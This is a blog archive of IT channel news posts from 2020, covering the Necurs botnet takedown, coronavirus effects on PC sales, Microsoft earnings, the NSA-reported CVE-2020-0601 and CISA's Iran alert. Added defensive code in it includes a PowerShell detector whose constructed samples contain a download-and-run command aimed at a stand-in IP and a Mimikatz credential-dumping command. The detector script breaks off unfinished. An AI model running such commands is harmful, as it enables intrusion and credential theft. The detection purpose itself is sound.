Microsoft, Partners Lead Global Offensive Against 'Necurs' Botnet

Microsoft and an international consortium of partners this week launched a counterstrike against Necurs, a massive botnet that Microsoft had been observing and analyzing for nearly eight years.

Botnets are packs of hundreds, thousands or millions of PCs, sometimes called zombies, that have been infected with malware and are under the command and control of malicious actors. Think of your parents' under-patched and out-of-support Windows 7 computer infected with a Trojan that enlists that computer in various nefarious schemes. The zombie PC's owner may notice nothing at all, or sometimes suspect a decline in performance. According to Microsoft, Necurs has had a role in a lot of those nefarious schemes.

Believed to be controlled by criminals in Russia, the botnet is also thought to have been used directly by its owners, as well as rented out as a botnet-as-a-service for various online skullduggery. One of its highest-profile roles was aiding in distribution of the GameOver Zeus banking trojan.

In the years since it first came to the attention of security researchers in 2012, the network has infected as many as 9 million computers globally. It has left its nasty digital fingerprints on pump-and-dump stock scams, fake pharmaceutical spam, Russian dating scams, Internet-based computer attacks, credential theft schemes, data theft attempts, cryptomining and, of course, ransomware. While botnets can be a key component of distributed denial-of-service (DDoS) attacks and Necurs has DDoS capabilities, Microsoft says that particular use for the botnet has not been documented.

Detailing what a big deal Necurs represents is a blog post from BitSight, a cyber risk management platform provider that worked closely with Microsoft on the Necurs problem. "From 2016 to 2019, it was the most prominent method to deliver spam and malware by criminals and was responsible for 90% of the malware spread by email worldwide," BitSight alleged.

In a sign of the complexity and length of the effort against Necurs, BitSight and Microsoft have been collaborating since 2017 to understand technical aspects of the botnet. That effort included techniques such as reverse engineering, malware analysis, module updates, infection telemetry, command and control updates, and forensic analysis, BitSight said.

In parallel with the technical work, Microsoft coordinated an international campaign involving the courts, other tech companies, ISPs, domain registries, government computer emergency response teams and law enforcement.

To prepare for the operational phase, Microsoft on March 5 got an order from the U.S. District Court for the Eastern District of New York. That order allowed Microsoft to take over the systems inside the United States that are used by Necurs for malware distribution and computer infections.

Microsoft and its partners crafted a sophisticated response built on the technical specifics of the Necurs botnet. Having studied the algorithm that Necurs uses to generate new domains, Microsoft used its considerable technical resources to jump ahead of the botnet. "We were then able to accurately predict over six million unique domains that would be created in the next 25 months," wrote Tom Burt, Microsoft corporate vice president for customer security and trust, in a blog post.

The response then leveraged Microsoft's web of global relationships with partner companies worldwide. "Microsoft reported these domains to their respective registries in countries around the world so the websites can be blocked and thus prevented from becoming part of the Necurs infrastructure," Burt said.
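As an added illustration of the technique these two paragraphs describe (example code written for this page; it is not Microsoft's or BitSight's code, and the domain generation scheme below is a deliberately simple hypothetical one, not the actual Necurs algorithm): once the generation algorithm and its seed are understood, a defender can precompute every domain it will emit over a future window, group those names by registry so they can be blocked before they are registered, and match DNS query logs against the predicted set to find infected hosts. The seed, the TLD list, the four-domains-per-day rate and the log-line format are all constructed assumptions.

```python
import hashlib
from datetime import date, timedelta

# Constructed values for the hypothetical scheme (assumptions, not Necurs parameters).
SEED = b"example-seed"            # stands in for a botnet's hard-coded seed
TLDS = ("com", "net", "org")      # constructed registry set
DOMAINS_PER_DAY = 4               # constructed rate
START = date(2020, 3, 10)         # first day of the prediction window

def generate_domain(seed: bytes, day: date, index: int) -> str:
    """Hypothetical DGA step: map (seed, day, index) deterministically to a name.
    Anyone holding the seed, attacker or analyst, derives the same names."""
    material = seed + day.isoformat().encode() + index.to_bytes(2, "big")
    digest = hashlib.sha256(material).digest()
    label = "".join(chr(ord("a") + b % 26) for b in digest[:12])
    tld = TLDS[digest[12] % len(TLDS)]
    return f"{label}.{tld}"

def predict_domains(seed: bytes, start: date, days: int) -> dict:
    """Jump ahead of the botnet: enumerate every name the scheme will produce
    over the window. Returns {domain: day} so each name's go-live date is known."""
    predicted = {}
    for offset in range(days):
        day = start + timedelta(days=offset)
        for index in range(DOMAINS_PER_DAY):
            predicted[generate_domain(seed, day, index)] = day
    return predicted

def group_by_registry(predicted: dict) -> dict:
    """Split the predicted names by TLD, one list per registry to report to."""
    by_tld = {}
    for name in sorted(predicted):
        by_tld.setdefault(name.rsplit(".", 1)[1], []).append(name)
    return by_tld

def flag_queries(log_lines, predicted: dict) -> list:
    """Match DNS query log lines (constructed format: '<ts> <client> <qname>')
    against the predicted set. Normalises case and the trailing dot so a
    resolver's canonical form still matches. Returns (client, name, live_day)."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines rather than fail the whole run
        _ts, client, qname = parts
        qname = qname.rstrip(".").lower()
        if qname in predicted:
            hits.append((client, qname, predicted[qname].isoformat()))
    return hits

def build_sample_log(predicted: dict) -> list:
    """Constructed DNS log: two benign lookups and two lookups of predicted names,
    one of them upper-cased with a trailing dot to exercise normalisation."""
    live = sorted(predicted)[:2]
    return [
        "2020-03-10T09:00:01Z 10.0.0.5 update.example.org.",
        f"2020-03-10T09:00:02Z 10.0.0.5 {live[0]}.",
        "2020-03-10T09:00:03Z 10.0.0.9 mail.example.com.",
        f"2020-03-10T09:05:00Z 10.0.0.9 {live[1].upper()}.",
    ]

if __name__ == "__main__":
    predicted = predict_domains(SEED, START, 30)
    print(f"{len(predicted)} domains predicted over 30 days")
    for tld, names in group_by_registry(predicted).items():
        print(f"  .{tld}: {len(names)} names to report")
    for client, name, live_day in flag_queries(build_sample_log(predicted), predicted):
        print(f"  {client} queried {name} (goes live {live_day})")
```

The real operation differed in scale (six million domains over 25 months) and in its legal component, the court order, but the mechanics are the same: the seed and algorithm, not the names, are the secret, so recovering them turns the botnet's own schedule into a blocklist and a detection feed.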

The main counterstrike was launched Tuesday from what a detailed New York Times account described as an "eerily empty Microsoft campus" due to most workers having been ordered home to prevent the spread of the coronavirus.

"By taking control of existing websites and inhibiting the ability to register new ones, we have significantly disrupted the botnet," Burt said. "Microsoft is also taking the additional step of partnering with Internet Service Providers (ISPs) and others around the world to rid their customers' computers of malware associated with the Necurs botnet."

As a concrete step, Microsoft is pointing users to the Microsoft Safety Scanner to help wipe their computers of malware, including Necurs.

While the Necurs botnet was massive, and Microsoft's effort to attack it required substantial resources, Microsoft executives were resigned to the likelihood that any drops in spam, malware and cyberattacks would be temporary at best. In the NYT article, executives described the effort -- sadly and accurately -- as a game of whack-a-mole.

Posted by Scott Bekker on March 11, 2020 at 2:56 PM


Coronavirus Concerns Sink PC, Smartphone Shipment Forecasts

Fears over the coronavirus and its effect on global supply chains will result in a leaner-than-expected year for the PC and smartphone markets, according to IDC.

The Framingham, Mass.-based research firm slashed forecasts last week for both PC shipments and smartphones. It now projects a 9 percent decline for the PC market in 2020, with total shipments reaching 374.2 million for the full year.

The big drops in shipments are expected in the first half of the year, with a decline of a little over 8 percent in Q1 and nearly 13 percent in Q2.

"We have already forgone nearly a month of production given the two-week extension to the Lunar New Year break and we expect the road to recovery for China's supply chain to be long with a slow trickle of labor back to factories in impacted provinces until May when the weather improves," said Linn Huang, an IDC research vice president, in a statement. "Many critical components such as panels, touch sensors, and printed circuit boards come out of these impacted regions, which will cause a supply crunch heading into Q2."

IDC's definition for PCs includes desktops, notebooks, workstations and tablets. Before the coronavirus appeared, IDC was already expecting a difficult year for PCs due to difficult comparisons against last year, when the Windows 7 replacement cycle boosted PC sales.

Also last week, IDC released revised forecasts for smartphone shipments in 2020. The firm had previously expected a better year for smartphones. Now, however, the supply chain issues, along with potential drops in demand in China, the world's largest smartphone market, due to the prevalence of the coronavirus there, are causing IDC to anticipate a decline of more than 2 percent in 2020. Shipment volumes are expected to reach around 1.3 billion units for the full year.

While IDC expects the PC market to work its way slowly out of this slump, the firm is more bullish on the smartphone market, which should benefit from a 5G tailwind in 2021.

Posted by Scott Bekker on March 02, 2020 at 2:26 PM


Microsoft: Coronavirus To Put Damper on Windows Business

Microsoft's third-quarter results will likely take a hit from the global coronavirus emergency and its impact on the supply chain, Microsoft warned investors this week.

The warning comes less than one month after Microsoft's Q2 earnings results, in which surprisingly strong demand for Windows, partly driven by end-of-support deadlines, helped the company exceed Wall Street expectations.

Even in its Q2 earnings call, however, Microsoft was already priming investors for a potential effect from the coronavirus, also known as COVID-19, which arose in Wuhan and has led to mass quarantines and industrial shutdowns in China. At the time, Microsoft provided what it called a wider-than-usual range of quarterly revenue guidance of $10.75 billion to $11.15 billion for the More Personal Computing segment, which includes Windows and Surface.

"Although we see strong Windows demand in line with our expectations, the supply chain is returning to normal operations at a slower pace than anticipated at the time of our Q2 earnings call," Microsoft said in its statement Wednesday. "As a result, for the third quarter of fiscal year 2020, we do not expect to meet our More Personal Computing segment guidance as Windows OEM and Surface are more negatively impacted than previously anticipated."

Microsoft did not provide a new range for the current quarter, which runs through the end of March. Revenues for other business units are not expected to be affected.

In the large stock market losses earlier in the week, Microsoft shares declined, but at a slightly lower rate. In extended trading after the announcement, Microsoft shares dropped a further 2%. Also following Microsoft's announcement, chipmaker Intel's shares declined about 1% and PC maker Dell's shares fell by about the same amount.

Posted by Scott Bekker on February 27, 2020 at 1:31 PM


SophosLabs: A Quarter of Malware Using TLS

The industrywide push in recent years toward encrypting Web traffic isn't just for good guys.

Encryption has always been neutral, as useful to bad actors for hiding nefarious activity as it is for legitimate users trying to protect their data from those trying to steal it.

New research from SophosLabs documents how widespread the use of HTTPS connections is becoming in malware circles, especially for communicating back to command-and-control servers (C2).

SophosLabs on Tuesday reported on a representative sampling of malware analyses the research team has conducted over the past six months.

"Out of all the malware that made some kind of network connection during their infection process, about 23% communicated over HTTPS, either to send or receive data from the C2, or during installation when they may use HTTPS to conceal the fact that they are retrieving malicious payloads or components," SophosLabs threat researcher Luca Nagy wrote in the blog post describing the research.

Not all types of malware communicate equally over TLS. Information-stealing trojans made up only 16 percent of the samples SophosLabs tested during the six-month period, but of those, 44 percent used TLS over standard HTTPS ports. Ransomware, which does its damage in other ways, was less likely to use encryption when calling home.

Sophos released the research Tuesday in conjunction with the launch of a new firewall, which features more advanced SSL inspection, including support for TLS 1.3 without requiring downgrading, new policy tools and performance improvements. More detail on XG Firewall v18 is available here.

Posted by Scott Bekker on February 18, 2020 at 2:29 PM


NuWave Offers Partners a White-Label Route to Teams Voice

As Microsoft herds its collaboration users toward the Teams platform, Teams voice services have grown rapidly, as well. Even with the rapid gains, usage of voice services in Teams represents a tiny fraction of overall Teams adoption. That lag reflects the challenges unique to voice, from network optimization to working with carriers to requirements for provisioning users.

One early technology partner of Microsoft's on Teams voice is trying to spur voice adoption with a new partner program. NuWave Communications on Thursday launched a white-label program to help partners and resellers get customers into voice plans without the need to build up expertise on daunting voice technologies.

Las Vegas-based NuWave now offers the white-labeling of iPilot, which is the company's relatively new provisioning portal for Teams Direct Routing customers. The iPilot portal works with NuWave's Direct Routing calling plans.

Mark Bunnell, chief operating officer for NuWave, contends that the time is right for voice services through Microsoft. "When Office 365 is the center of your universe as a business, it's really easy to think about getting Teams voice and bringing it all together," Bunnell told me in an interview Thursday.


As they have with Lync, Skype and other Microsoft services, however, partners struggle with the leap from IT infrastructure to voice services.

"Teams right now is equated to the gold rush. Everyone is trying to get a piece, everyone is trying to turn on a Teams practice. Like the gold rush, nobody brought clothes or food so they froze to death on the way up there," Bunnell said of the rough experiences some customers and partners have had with voice services.

NuWave's approach stems from the company's 20-plus year history in SIP Trunking, hosted PBX, unified communication as a service (UCaaS) and related fields. "We've taken the extremely complex and we've made a turnkey solution that doesn't make [the partners] be technical," Bunnell said.

First, iPilot leverages NuWave's experience from several years of Teams voice deployments, covering migrations from Microsoft's older voice platforms or other sources and handling the PowerShell elements of provisioning users within a customer's Microsoft tenant. Because it also provides the lines, the company can cut the time to set up a proof of concept from what in many cases takes several weeks to under an hour, Bunnell said.

After the setup, NuWave provides end-user training materials, such as user guides and videos, to get customers up to speed quickly. With the white-label program, partners have the ability to customize the pricing customers see and the phones they want to offer, he said.

"It really enables you to turn up a customer, get them fully trained and move on to the next one," Bunnell said.

Voice services aren't for every Office 365 partner. But for those looking for a way to spin up a quick, low-investment Teams voice practice, NuWave is saying the right things.

Posted by Scott Bekker on February 13, 2020 at 10:16 AM


Ian Thornton-Trump's Hair Is on Fire About Threat Intelligence for the Channel

One of the most engaging voices in the IT channel security community, Ian Thornton-Trump, is on the move. RCP caught up with Thornton-Trump last month just as he was getting started in a new role at Cyjax, an 8-year-old U.K.-based cyber threat intelligence provider.

Thornton-Trump joins Cyjax as chief information security officer. The dual role includes internal cybersecurity responsibilities along with helping the company prepare for an expansion into the U.S. channel. At the same time, Thornton-Trump is piloting a cyber threat intelligence workshop for CompTIA.

We talked to Thornton-Trump about why he thinks the moment is right for managed service providers (MSPs) to get involved in security threat intelligence. Edited excerpts of the conversation are below.

Two major security issues a few years ago got Thornton-Trump thinking seriously about security intelligence and the channel.
"I go back to really WannaCry and EternalBlue. The US-CERT and Microsoft made noises prior to that malware being weaponized. At that time it was about 58 days before the first impactful attacks happened from when Microsoft announced that there is a vulnerability in [its Server Message Block protocol], and they were pushing patches even for out-of-date operating systems. Now, the threat intelligence analysis of that is kind of, 'Holy crap, if Microsoft is going to support unsupported operating systems and issue an out-of-band patch for it, it must be super bad.'

"For whatever reason, I don't think people were paying attention. When you look at some of the big dogs out there, Maersk and Merck, the pharmaceutical company, that then got hit by NotPetya, which leveraged the same attack, essentially, as WannaCry, you kind of wonder if anybody was listening out there.

"So I felt like for the small/medium business practitioners and those MSPs that service them, no one was really providing good, credible intel to small and medium-sized business [SMB] customers about this stuff."


In the nearly three years since those attacks, Thornton-Trump believes government agencies in the United States and the United Kingdom have greatly improved their alerting and threat communications. Yet he also contends that MSPs and SMB IT pros need much more help.
"The importance of a government tool to tell you that you're vulnerable means rather than it being the security guy who's all concerned going to the business, it's literally the government telling you that you need to patch."

Thornton-Trump said he sees an opportunity for Cyjax, which offers threat intelligence and associated dashboards, to provide some of the data that will help MSPs make the business case for action.
"Historically, cybersecurity practitioners and IT practitioners may be somewhat challenged in terms of business communication. Having data from a third-party trusted source that says, 'Listen, we have X number of assets that are vulnerable to BlueKeep. We need to disrupt the business operations for a couple of hours to patch and update our infrastructure so that we're not victimized by a cybercrime attack, which in 90 percent of the cases for business today would be a very disruptive ransomware attack requiring weeks and unanticipated financial expenses.'

"We can go into boardrooms with our hair on fire. But when we're challenged by the business to provide a true statement or understanding of the risk, a lot of it falls down because what the practitioners are not doing is coming armed to the fight with the return on investment or the stark warnings from government bodies, law enforcement bodies. I want to close that gap in the channel."

As Cyjax works on a channel program to adapt its cyber threat intelligence offerings to MSP technical and business requirements, Thornton-Trump says the sector has the potential to be a high-value, low-cost revenue opportunity for MSPs and IT service pros.
"I'm excited about the opportunity to take my original message of layered security and now turn it into a true proactive threat model -- modeling and risk management by using intelligence."

At the same time, Thornton-Trump is demonstrating a workshop/course on "Cyber Threat Intelligence" at the CompTIA conference in Manchester, England next month.
"The course is designed to help an MSP or an SMB build its own threat intelligence program using publicly available tools. My idea here is to equip businesses to get in front of cyber attacks, get meaningful data and make appropriate business decisions based on their threat model and their risk profile. I'm really passionate about that. I want to create more capacity."

Both efforts, building a channel program for Cyjax and developing the independent training, are coming at a key time for MSPs, in Thornton-Trump's estimation.
"This is coming at a moment where MSPs are waking up and finding many of their customers victimized by ransomware, which is potentially putting their livelihood at risk. I'm talking about the Cloud Hopper series of attacks, which has now been adapted by cybercriminals who are specifically targeting MSPs and IT service pros. So I think the time is right to get the upper hand and to get the opportunity to get in front of these attacks, and protect customers and ultimately protect the livelihood of businesses."

Posted by Scott Bekker on February 11, 2020 at 12:04 PM


Top Microsoft Partners Wanted: Nominations Open for the RCP 350

Want to get your Microsoft partner company noticed in 2020? Submit your entry to be included in Redmond Channel Partner's RCP 350 list.

As in previous years, it's a qualitative list of the Microsoft solution provider companies that demonstrate a laser focus on Microsoft technology and a strong commitment to providing great value for their customers.

There are a few requirements -- companies that get listed must belong to the Microsoft Partner Network (MPN), must have major end-user service operations in the United States and should have at least one Microsoft gold competency.

Beyond that, the list is subjective. We're not just looking for the biggest companies or the broadest coverage of Microsoft technologies. Some winners are niche providers, focused on a sliver of the Microsoft stack. Others have a great local reputation. Still others are regular Microsoft regional award winners.

There are a few exciting differences in the list this year. For one, we're expanding from the previous 200 entries to 350. It will still be an elite few of the tens of thousands of Microsoft partners in the United States, but the list will be more comprehensive.

What is more important is where the list will appear. In its final form, the RCP 350 will be posted as a PDF on RCP's sister site, Redmond. Redmond is the premier site where C-level executives, IT decision makers and IT professionals go for their Microsoft infrastructure news and commentary. By appearing in the list on Redmond, your company will be in front of more potential customers interested in the types of expertise you have.

Selection for the list is a judgment made by our editors as a service to readers of RCP and Redmond. There is no cost for submissions or inclusion in the list. Results will be released in July 2020.

The survey is short. There are only 11 questions, including company basics and contact information. Revenues and employee headcount questions are optional. We recommend that you put your main effort into this question: "Briefly explain why the company belongs in the RCP 350." There is effectively no character limit for your answer, although we respectfully request that you keep it to fewer than 500 words for purposes of our sanity here at RCP.

Does your company have what it takes? Fill out the application here by April 3 to make sure you're considered.

Posted by Scott Bekker on February 04, 2020 at 1:58 PM


Windows Plays a Surprisingly Positive Role in Microsoft Earnings

Surprisingly strong demand for Windows, partly driven by important end-of-support deadlines, was among the major factors helping Microsoft exceed Wall Street expectations for its most recent quarter.

Microsoft on Wednesday evening reported revenues of $36.9 billion and diluted earnings per share of $1.51, both well ahead of consensus analyst expectations. The earnings period covered Microsoft's second financial quarter, which spans the last three months of 2019. The usual growth sources, like Azure, Office 365, Dynamics and LinkedIn, all delivered in the quarter. But Windows, which has been more of a drag of late, was a standout in Q2.

It was the last full quarter before end-of-support deadlines hit on Jan. 14 for Windows 7, Windows Server 2008/R2 and Hyper-V Server 2008/R2.

Microsoft's overall business unit that includes Windows clients is More Personal Computing, and the sector outpaced the company's previous guidance. "Revenue was $13.2 billion, increasing 2% and 3% in constant currency, ahead of expectations as better-than-expected performance across our Windows businesses more than offset lower than expected search and Surface revenue," Microsoft CFO Amy Hood said during the earnings call with investors Wednesday.

The end-of-support effects were strong in the OEM Pro sector, which Hood said makes up roughly 40% of total Windows revenue. Those revenues, she said, "grew 26%, driven by continued momentum in advance of Windows 7 end of support and strong Windows 10 demand."

Windows Server 2008 end-of-support also contributed to overperformance in a different business unit, Intelligent Cloud. "Our on-premises server business grew 10% and 12% in constant currency with roughly four points of benefit from the end of support for Windows Server 2008," Hood said.

End of support was only one among several factors behind the gains for Windows. On the PC side, market growth was stronger than Microsoft anticipated. It also benefited from comparisons to last year, when a chip shortage was inhibiting OEM partners' ability to ship PCs. Microsoft's More Personal Computing unit also benefited from revenue growth in commercial products and cloud services, which includes Microsoft 365.

On the server side, Hood also credited some of the growth to Azure Hybrid Benefits, which allow Software Assurance customers to put Windows Server licenses into virtual machines on Azure at a reduced cost.

For the current financial quarter, Microsoft expects the support deadlines that just passed to provide a continuing boost to revenues.

"In Windows, overall, OEM revenue growth should be in the low to mid-single digits and continue to reflect healthy Windows 10 demand, end of support for Windows 7 and the supply chain's ability to meet demand," Hood said. "Growth in our on-premises server business should be high single digits, again driven by strong hybrid demand, as well as some continued benefit related to the end of support for Windows Server 2008."

One variable for Windows revenues in Q3 is a question mark for everyone -- the coronavirus outbreak, which has led to the quarantining of 16 cities in China and prompted Russia to begin closing its border with China.

Hood cited the "uncertainty related to the public health situation in China" as the reason Microsoft's guidance for next quarter in More Personal Computing covers a wider range of revenues than usual.

Posted by Scott Bekker on January 30, 2020 at 10:50 AM


Nadella: 'Building Tools for Developers Is Who We Are as a Company'

Microsoft CEO Satya Nadella reaffirmed the company's central focus on developers in no uncertain terms this week.

Speaking to financial analysts on Wednesday during a wide-ranging investor call about Microsoft's second quarter earnings, Nadella said, "We want to build the best tool chain."

Then he got into why.

The statement came in response to a question from Morgan Stanley equity analyst Keith Weiss about Nadella's views on Microsoft's progress with developers since the major GitHub acquisition in 2018.

"We're very excited about what's happening with the developer offering," Nadella said. "I think of what we are doing between Visual Studio and Azure DevOps and GitHub as effectively coming together as a compelling developer's SaaS solution in the same class as any other SaaS solution from Microsoft around productivity and communication."

Most of the talk out of Microsoft lately emphasizes Azure, cloud more generally or artificial intelligence. Nadella's comment to analysts, however, shows that he hasn't forgotten who must make the software giant's offerings work at an individual company level.

In fact, Nadella likes to point out that there are more software engineers/developers in the non-tech sector now than there are in the tech sector itself.

And while Weiss couched his question in the context of whether the developer tools give Azure a competitive advantage over Amazon Web Services and Google Cloud Platform, Nadella steered it back to Microsoft being focused on the needs of developers rather than a need to advance Microsoft platforms.

"We're not focused only on Azure. For developers who use our tool chain, they can target any cloud, any edge device. And so this is not a sort of means to some end; we've always been clear about it, it's an end to itself," Nadella said. "We want to stay true to that ethos of open source, GitHub, and do the best tools."

Now, before things sound too pie-in-the-sky, Nadella reassured the audience of investors that those developer tools as a SaaS business are high-margin for Microsoft and suggested that the tools are optimized for developers coding for the Microsoft ecosystem.

Nadella's profession of love for building tools for developers doesn't have the wild, enthusiastic energy of former CEO Steve Ballmer sweatily pointing and yelling "Developers! Developers! Developers! Developers!"

Yet Microsoft's third CEO's quiet, confident and understated delivery communicates an equally forceful commitment.

Posted by Scott Bekker on January 30, 2020 at 11:29 AM


The NSA Takes Center Stage on a Microsoft Patch

The U.S. National Security Agency discovered, reported and was publicly credited by Microsoft for a significant vulnerability whose fix is included in the first Patch Tuesday release of the year.

The NSA's public cooperation with Microsoft in defending users of the operating system marks a change from the agency's well-documented past practice of quietly collecting and weaponizing serious OS flaws that are discovered by its researchers.

Microsoft and the NSA offered differing characterizations of the flaw in Windows 10, Windows Server 2016 and Windows Server 2019. While Microsoft encouraged all users to rapidly apply the patch, the structure of Microsoft's extensive vulnerability rating system slightly underplays the severity of the flaw. The NSA, on the other hand, warned that the consequences of not patching would be "severe and widespread."

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) also released an Emergency Directive and Activity Alert regarding the flaw on Tuesday. While CISA's directive only applies to certain federal agencies, the agency's warnings are often heeded by state and local governments and private sector organizations.

In a Cybersecurity Advisory released at the same time as Microsoft's patches, the NSA said:

NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows cryptographic functionality. The certificate validation vulnerability allows an attacker to undermine how Windows verifies cryptographic trust and can enable remote code execution. The vulnerability affects Windows 10 and Windows Server 2016/2019 as well as applications that rely on Windows for trust functionality. Exploitation of the vulnerability allows attackers to defeat trusted network connections and deliver executable code while appearing as legitimately trusted entities.

Offering examples of ways that validations of trust may be impacted, the NSA cited HTTPS connections, signed files and e-mails, and signed executable code launched as user-mode processes.

"The vulnerability places Windows endpoints at risk to a broad range of exploitation vectors," the NSA statement said in explaining the agency's alarm over the issue. "NSA assesses the vulnerability to be severe and that sophisticated cyber actors will understand the underlying flaw very quickly and, if exploited, would render the previously mentioned platforms as fundamentally vulnerable. The consequences of not patching the vulnerability are severe and widespread. Remote exploitation tools will likely be made quickly and widely available. Rapid adoption of the patch is the only known mitigation at this time and should be the primary focus for all network owners."

On Microsoft's severity scale, however, the vulnerability was rated as being "important" rather than Microsoft's top level of "critical." Microsoft noted that the flaw had not been publicly disclosed, and there were no known public exploits of the flaw currently. Microsoft did give the flaw its "exploitation more likely" rating for both its latest software releases and older software releases. That is the highest level on Microsoft's exploitability index assessment short of flaws for which exploits already exist. Microsoft applies that rating in cases where Microsoft believes exploit code could be created to consistently exploit the vulnerability and when there are past cases where the specific type of vulnerability has been exploited.

Microsoft's technical description of the vulnerability acknowledges the NSA, which is a first. In a separate public statement about CVE-2020-0601, Mechele Gruhn, principal security program manager for the Microsoft Security Research Center, does not name the NSA but does talk about cooperation with security researchers to work on patching newly discovered vulnerabilities.

"This vulnerability is one example of our partnership with the security research community where a vulnerability was privately disclosed and an update released to ensure customers were not put at risk," Gruhn wrote.

Rumblings that a major patch was on the way emerged earlier in the week. The Krebs on Security blog posted an article on Monday with details of the patch collected from sources, and referenced Twitter posts from security industry insiders who indicated something substantial was afoot.

The agency's cooperation reflects a larger debate about the appropriate role of America's digital spy agency. Historically, the organization is known for its offensive capabilities: hiring top researchers to find and exploit vulnerabilities, build them into sophisticated toolsets, and keep those tools secret and productive for as many years as possible. But the security, intelligence and public relations disasters surrounding the EternalBlue exploit and other NSA tools leaked by the Shadow Brokers group highlighted a self-defeating flaw in that approach: because the United States is one of the most digitized and Internet-connected countries in the world, U.S.-developed tools that fall into the hands of adversaries can do more damage to the U.S. government and U.S. businesses than they ever did to their intended targets.

In a statement reported by The Washington Post, a senior NSA official acknowledged the shift in gears represented by the public cooperation on protecting infrastructure versus secretly attacking it.

"This is...a change in approach...by NSA of working to share, working to lean forward, and then working to really share the data as part of building trust," the Post quoted Anne Neuberger, director of the NSA's Cybersecurity Directorate, as saying Tuesday. Krebs on Security's Brian Krebs, apparently reporting from the same NSA news conference, added via Twitter that Neuberger also said this wasn't the first time NSA has reported a vulnerability to Microsoft, but it is the first time it has accepted credit or attribution when Microsoft asked.

The NSA dubs the operation "Turn a New Leaf," and it received praise from security researchers. That said, the agency's strategic mission of exploiting enemy networks undoubtedly remains unchanged.

Yes, the NSA has just helped Microsoft and its more attentive customers patch a flaw. At the same time, is it tinfoil hat territory to bet that other teams at NSA are involved in the race to develop exploits based on the same vulnerabilities, or perhaps have already done so given the agency's head start?

What we have here is a complicated dance. The NSA is playing a slightly more transparent -- and from the standpoint of software vendors and their customers, a more constructive -- role in network security than it has in the past. At least it is playing that role in this specific case. We'll take what we can get.

Posted by Scott Bekker on January 14, 2020 at 9:39 AM


Feds Warn of Potential Iranian Cyberattacks

The U.S. agency in charge of cybersecurity is urging organizations in the United States to prepare for potential attacks from Iran in response to the American drone killing of General Qassim Suleimani.

The Cybersecurity and Infrastructure Security Agency (CISA) issued its warning, "Potential for Iranian Cyber Response to U.S. Military Strike in Baghdad," on Monday afternoon. CISA is a federal agency created in 2018 to coordinate with other government entities and the private sector on cybersecurity and critical infrastructure protection.

The drone attack as Suleimani was visiting Baghdad last week is widely expected to prompt counterattacks of some sort from Iran, with Iranian leaders vowing as much in recent days. One of the most rapid ways that Iran can respond is through attacks on computer systems of U.S. businesses and government agencies.

"Iran has a history of leveraging asymmetric tactics to pursue national interests beyond its conventional capabilities," the CISA alert said. "More recently, its use of offensive cyber operations is an extension of that doctrine. Iran has exercised its increasingly sophisticated capabilities to suppress both social and political perspectives deemed dangerous to Iran and to harm regional and international opponents."

A site defacement already occurred over the weekend, when the Web site for the U.S. Federal Depository Library Program was replaced with an image of a bloodied President Trump being punched in the face. Text in English across the bottom of the page read, "Hacked by Iran Cyber Security Group HackerS ... ;)". A CISA spokesperson told the Washington Post that the attacker used a misconfiguration within the content management system to effect the defacement, and that CISA was unable to provide confirmation that the attack had any actual link to Iran.

In a primer section of its alert, CISA recommended that organizations "adopt a state of heightened awareness," "increase organizational vigilance," "confirm reporting processes" and "exercise organizational incident response plans." The document also details mitigation and detection recommendations for advanced persistent threat (APT) techniques that Iranian state-sponsored actors are believed to have used in the past, such as spearphishing, credential dumping and execution through PowerShell or other scripting.
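As an added illustration of the kind of detection logic those recommendations imply (this is example code written for this page, not part of the CISA alert or any CISA tooling), the Python below scans a handful of constructed Windows event records for the technique families named above: PowerShell command lines that carry an encoded payload or a download cradle, credential-dumping indicators such as Mimikatz or an LSASS dump via comsvcs.dll, and the profile-suppressing and window-hiding switches that usually accompany them. The event shape, hostnames, user names, IP address and command lines are all assumptions made up for the example; the indicator patterns are illustrative rather than exhaustive.

```python
import base64
import re

# PowerShell switch that carries a base64 (UTF-16LE) payload:
# -e, -ec, -en, -enc, -EncodedCommand (all case-insensitive).
ENC_RE = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Indicator families loosely mapped to the techniques CISA lists (credential
# dumping, PowerShell, scripting). Illustrative, not exhaustive.
INDICATORS = {
    "credential_dumping": re.compile(
        r"sekurlsa|invoke-mimikatz|\blsass\b|comsvcs\.dll|procdump", re.I),
    "download_cradle": re.compile(
        r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|"
        r"\biwr\b|\biex\b|invoke-expression", re.I),
    "evasion_switches": re.compile(
        r"-(?:nop|noprofile|noni|noninteractive|w(?:indowstyle)?\s+hidden|"
        r"ep\s+bypass|executionpolicy\s+bypass)\b", re.I),
}


def encode_powershell(command):
    """Encode as powershell.exe -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # bad base64 or odd byte count
        return None


def scan_event(event):
    """Return the list of indicator names that fire on one event record."""
    text = event.get("cmdline") or event.get("script") or ""
    tags = []
    decoded = decode_encoded_command(text)
    if decoded is not None:
        tags.append("encoded_command")
        text = text + "\n" + decoded  # inspect the decoded payload as well
    for name, pattern in INDICATORS.items():
        if pattern.search(text):
            tags.append(name)
    return tags


def scan_events(events):
    """Return one finding per event that tripped at least one indicator."""
    findings = []
    for ev in events:
        tags = scan_event(ev)
        if tags:
            findings.append({"host": ev["host"], "user": ev["user"],
                             "event_id": ev["id"], "tags": tags})
    return findings


# Constructed sample records (hypothetical hosts, users and commands) in the
# rough shape of Security 4688 process-creation and PowerShell 4104
# script-block events. Not real log data.
SAMPLE_EVENTS = [
    {"id": 4688, "host": "ws01", "user": "jdoe",
     "cmdline": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1"},
    {"id": 4688, "host": "ws02", "user": "asmith",
     "cmdline": "powershell.exe -NoP -W Hidden -enc " + encode_powershell(
         "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')")},
    {"id": 4104, "host": "ws02", "user": "asmith",
     "script": "Invoke-Mimikatz -Command '\"sekurlsa::logonpasswords\"'"},
    {"id": 4688, "host": "srv01", "user": "svc_backup",
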